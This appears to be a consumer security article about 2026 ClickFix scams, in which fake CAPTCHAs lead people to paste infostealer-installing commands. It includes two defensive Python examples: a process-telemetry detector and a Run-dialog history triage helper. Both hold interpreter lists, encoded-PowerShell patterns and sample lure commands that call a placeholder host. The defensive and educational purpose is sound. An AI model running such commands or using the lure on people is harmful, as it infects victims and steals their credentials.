ClickFix and Fake CAPTCHAs: The 2026 Scam That Tricks You Into Infecting Yourself
ClickFix attacks skip exploits entirely: they convince you to paste a malicious command yourself. Here is how to recognize and refuse the trap.

The cleverest malware of 2026 does not exploit a software flaw; it exploits you. "ClickFix" attacks display a fake CAPTCHA, a bogus browser error, or a phony "fix this" prompt, and instruct you to copy a snippet and paste it into a terminal or the Windows Run box to "verify" or "repair." When you do, you run the attacker's command yourself, installing an infostealer that scoops up your passwords, cookies, and crypto wallets.
Quick answer
ClickFix is a social engineering scam that tricks you into pasting a malicious command into the Windows Run box, PowerShell, or macOS Terminal under the guise of a CAPTCHA, browser update, or error fix. Because you run the command yourself using trusted system tools, there is no exploit for antivirus to catch. The one rule that defeats the entire category: never paste a command you did not write yourself into a terminal or Run box, because no legitimate verification step ever asks you to do that.
Key takeaways
- ClickFix is social engineering, not an exploit: it convinces you to copy and run a malicious command yourself, sidestepping technical defenses.
- Lures include fake CAPTCHAs ("verify you are human"), fake browser or system errors, and bogus software/AI-tool installers.
- On Windows, victims are pushed to paste commands into the Run dialog or PowerShell; on macOS, into Terminal, often delivering infostealers like Vidar or Atomic macOS Stealer (AMOS).
- At least 20 distinct campaigns targeted AI and "vibe coding" tools between February and March 2026, and hacked WordPress sites have hosted fake CAPTCHA pages.
- The single best defense is a rule: never paste a command you did not write into a terminal or Run box; no legitimate CAPTCHA or error fix ever asks for that.
How the trick works
The flow is designed to feel routine. You hit a website, sometimes a legitimate one that has been compromised, and a "verification" overlay appears: a CAPTCHA, a "your browser needs an update" banner, or a "press these keys to continue" prompt. The instructions look like a standard human check, but they tell you to:
- Copy a piece of text (silently placed on your clipboard).
- Open the Windows Run dialog (Win+R) or PowerShell, or macOS Terminal.
- Paste and press Enter.
That pasted text is a command. On Windows it often abuses legitimate binaries like mshta to fetch and run a payload; on macOS, a Terminal command silently downloads, mounts, and launches malware from a disk image. The result is an infostealer harvesting your saved passwords, browser cookies and session tokens, and cryptocurrency wallet data.
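The execution chain described above leaves a distinctive mark in endpoint telemetry: a command entered in the Win+R Run dialog is spawned by explorer.exe, so an interpreter or downloader such as mshta or PowerShell that explorer.exe launches with a URL, an encoded script or a hidden window is what a victim-run lure looks like from the defender's side. The following detector is an added example written for this article, not code from the article or from any vendor; the telemetry format is a constructed tab-separated export of Sysmon Event ID 1 / Security 4688 fields, the sample events and the `lure.example` host are made up, and the list of interpreters beyond mshta is an assumption about which built-in binaries these lures typically invoke.

```python
"""Heuristic detection of ClickFix-style execution in Windows process-creation
telemetry. Added example for this article, not code from it or from any vendor.

Input is a constructed, tab-separated key=value export of the fields you would
get from Sysmon Event ID 1 or Security Event 4688 (ParentImage, Image,
CommandLine). A command pasted into the Win+R Run dialog is launched by
explorer.exe, so the rule pairs that parent with a scripting/download binary
and at least one content indicator (URL, encoded script, hidden window)."""
import ntpath
import re
from dataclasses import dataclass, field

# mshta is named in the article; the other binaries are an assumption about
# which built-in interpreters/downloaders such lures typically invoke.
INTERPRETERS = {
    "mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
    "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe",
}

URL_RE = re.compile(r"\bhttps?://", re.IGNORECASE)
# -EncodedCommand and the abbreviations PowerShell accepts (-e, -ec, -en, -enc)
ENCODED_RE = re.compile(r"(?<![\w-])-e(?:nc(?:odedcommand)?|c|n)?\b", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:in(?:dowstyle)?)?\s+hidden\b", re.IGNORECASE)


@dataclass
class Verdict:
    image: str
    suspicious: bool
    reasons: list = field(default_factory=list)


def parse_event(line: str) -> dict:
    """Split one tab-separated key=value line into a field dict."""
    event = {}
    for part in line.rstrip("\n").split("\t"):
        key, _, value = part.partition("=")
        event[key] = value
    return event


def assess(event: dict) -> Verdict:
    """Score a single process-creation event."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    image = ntpath.basename(event.get("Image", "")).lower()
    cmd = event.get("CommandLine", "")
    reasons = []

    run_dialog_launch = parent == "explorer.exe" and image in INTERPRETERS
    if run_dialog_launch:
        reasons.append("interpreter spawned by explorer.exe (Run-dialog launch pattern)")
    if URL_RE.search(cmd):
        reasons.append("remote URL in command line")
    if ENCODED_RE.search(cmd):
        reasons.append("encoded PowerShell command")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden window requested")

    # Require the launch pattern plus at least one content indicator, so a user
    # who merely opens PowerShell from Win+R does not trigger an alert.
    suspicious = run_dialog_launch and len(reasons) >= 2
    return Verdict(image, suspicious, reasons)


def scan(lines):
    """Assess every non-empty telemetry line and return verdicts in order."""
    return [assess(parse_event(line)) for line in lines if line.strip()]


# Constructed sample telemetry. lure.example is a placeholder host and the
# base64 blob is just the word PLACEHOLDER, not a real payload.
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\mshta.exe"
    "\tCommandLine=mshta https://lure.example/verify",
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell -NoProfile -WindowStyle Hidden -EncodedCommand UExBQ0VIT0xERVI=",
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\notepad.exe"
    "\tCommandLine=notepad C:\\Users\\alice\\notes.txt",
    "ParentImage=C:\\Windows\\System32\\cmd.exe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell -File C:\\build\\release.ps1",
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell",
]

if __name__ == "__main__":
    for verdict in scan(SAMPLE_EVENTS):
        label = "ALERT " if verdict.suspicious else "ok    "
        print(f"{label}{verdict.image}: {'; '.join(verdict.reasons) or 'no indicators'}")
```

The two-factor rule (launch pattern plus a content indicator) is what keeps this usable: the first two sample events alert, while a user who opens Notepad or a bare PowerShell prompt from Win+R, or a build script launched from cmd.exe, stays quiet. The same logic ports directly to a SIEM rule keyed on parent image, child image and command line.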
Why it slips past defenses
ClickFix works precisely because it routes around the technology. There is no exploit to detect, no malicious attachment to scan, and no obviously bad download; the victim performs the install manually using legitimate system tools. That is why campaigns keep growing: hacked WordPress sites deliver the Vidar infostealer through fake CAPTCHA pages, and macOS users get the Atomic macOS Stealer via Terminal commands disguised as troubleshooting steps. Attackers have leaned hard into "verification fatigue": people are so used to clicking through CAPTCHAs that they follow the steps on autopilot.
Warning
No real CAPTCHA, browser update, or error fix will ever ask you to open Terminal, PowerShell, or the Run dialog and paste a command. The instant a "verification" step asks you to do that, it is an attack. Close the tab.
These are the lures you will actually see, and the tell that gives each one away:
| Lure | What it claims | The tell |
|---|---|---|
| Fake CAPTCHA | "Verify you are human" with keyboard steps | Real CAPTCHAs use checkboxes or image clicks, never keystrokes |
| Fake browser error | "Your browser needs a manual fix" | Browsers update themselves; they never ask you to run a command |
| Fake software or AI-tool installer | "Run this to install the tool" | Legitimate installers are signed apps, not pasted Run commands |
| Fake document or CAPTCHA on a hacked site | "Press Win+R then paste to view" | Viewing a document never requires the Run dialog |
How to protect yourself
- Adopt one hard rule. Never paste a command you did not write yourself into Terminal, PowerShell, or the Win+R Run box. If a web page tells you to, stop immediately.
- Be suspicious of "verify you are human" steps that involve keystrokes. A genuine CAPTCHA asks you to click images or a checkbox, never to run a command.
- Watch your clipboard. These attacks silently put the command on your clipboard. If you ever paste something into a terminal and see a command you did not copy, do not run it.
- Read before you run. If you genuinely need to run a command from somewhere, understand exactly what it does first. If you do not 100% understand it, do not execute it.
- Keep OS and browser updated and run reputable security software that can block known malicious sites and detect infostealers as a backstop.
If you already ran one
Move fast; infostealers exfiltrate within seconds:
- Disconnect the machine from the network to limit further theft.
- Change passwords for important accounts from a different, clean device, prioritizing email, banking, and crypto.
- Invalidate sessions. Stolen cookies let attackers bypass your password entirely, so sign out everywhere and revoke active sessions on critical accounts; this is the same threat we cover in protecting against infostealer cookie and session theft.
- Move any crypto to a fresh wallet if wallet data may have been on the machine.
- Scan and, if in doubt, rebuild the affected system, since infostealers may drop additional payloads.
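Before resetting credentials and deciding whether to rebuild, a responder wants to know exactly what was pasted. On Windows the Run dialog keeps its history in the registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU: each entry is a single-letter value whose string ends in a literal "\1" marker, and the MRUList value lists those letters most-recent-first. The helper below, an added example written for this article rather than code from it or from any vendor, reconstructs that history from an exported copy of the key and picks out entries that look like pasted commands. The export is constructed, `lure.example` is a placeholder host, and the set of interpreters beyond mshta is an assumption.

```python
"""Incident-response triage: recover what was typed into the Windows Run dialog.
Added example for this article, not code from it or from any vendor.

Windows stores Run-dialog history under
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU. Each entry is a
single-letter value whose string ends in a literal "\\1" marker, and the
MRUList value lists the letters most-recent-first. The dict below stands in
for an export of that key and is constructed, not taken from a real machine."""
import re

# Built-in interpreters/downloaders a pasted lure typically invokes; mshta is
# named in the article, the rest are an assumption.
INTERPRETERS = {
    "mshta", "powershell", "pwsh", "cmd", "wscript", "cscript",
    "curl", "certutil", "bitsadmin",
}
# A URL, or PowerShell's -EncodedCommand and its accepted abbreviations.
PAYLOAD_HINT_RE = re.compile(
    r"https?://|(?<![\w-])-e(?:nc(?:odedcommand)?|c|n)?\b", re.IGNORECASE
)


def parse_runmru(values: dict) -> list:
    """Return Run-dialog history most-recent-first, with the "\\1" marker stripped."""
    history = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:
            continue
        history.append(raw[:-2] if raw.endswith("\\1") else raw)
    return history


def flag_pasted_commands(history: list) -> list:
    """Return entries that look like a pasted command rather than a program name:
    they start an interpreter/downloader and carry a URL or an encoded payload."""
    flagged = []
    for entry in history:
        tokens = entry.split()
        first = tokens[0].lower() if tokens else ""
        first = first.rsplit("\\", 1)[-1]                     # drop any path prefix
        first = first[:-4] if first.endswith(".exe") else first
        if first in INTERPRETERS and PAYLOAD_HINT_RE.search(entry):
            flagged.append(entry)
    return flagged


# Constructed RunMRU export: MRUList "cab" means entry c is the newest.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": "mshta https://lure.example/verify\\1",
}

if __name__ == "__main__":
    history = parse_runmru(SAMPLE_RUNMRU)
    print("Run history (newest first):", history)
    print("Pasted-command candidates:", flag_pasted_commands(history))
```

On a live machine you would feed the function the values read from that key (for example via a registry export or the `winreg` module). A flagged entry is the command the victim actually executed, which tells you which payload to look for and confirms that the credential and session resets above are warranted; a history that shows only program names such as notepad or cmd does not rule out a PowerShell or Terminal paste, since those leave no RunMRU entry.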
Because the whole attack is a social-engineering con, the mindset that defeats it overlaps with defending against AI phishing: slow down, distrust urgency, and verify before you act.
Frequently asked questions
Is ClickFix a virus or a vulnerability?
Neither, in the traditional sense; it is social engineering. The attacker tricks you into running a command yourself, so there is no software flaw to patch. Awareness is the primary defense.
A page told me to press Win+R and paste something. Is that ever legitimate?
No. No legitimate website verification, browser update, or error fix requires you to open the Run dialog, PowerShell, or Terminal and paste a command. Treat any such instruction as a confirmed attack and close the page.
Does this only affect Windows?
No. There are active macOS campaigns that instruct victims to paste commands into Terminal, delivering infostealers like the Atomic macOS Stealer. The lure and the "paste a command" mechanic are the same across platforms.
My antivirus is on. Am I protected?
Security software helps as a backstop and may block known malicious sites or payloads, but ClickFix is designed to bypass detection by having you run trusted system tools manually. The reliable defense is refusing to paste unknown commands in the first place.
The bottom line
ClickFix is the rare malware that needs your cooperation, and it gets that cooperation by dressing the attack up as a routine CAPTCHA or error fix. Internalize one rule and you defeat the entire category: never paste a command you did not write into a terminal or Run box. No legitimate verification ever asks for that.
Sources & further reading
- microsoft.com/en-us/security/blog/2026/05/06/clickfix-campaign-uses-fake-macos-utilities-lures-deliver-infostealers/
- sentinelone.com/blog/how-clickfix-is-weaponizing-verification-fatigue-to-deliver-rats-infostealers/
- malwarebytes.com/blog/threat-intel/2026/03/hacked-sites-deliver-vidar-infostealer-to-windows-users
- bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer/
- cybersecuritynews.com/clickfix-infostealer-campaign/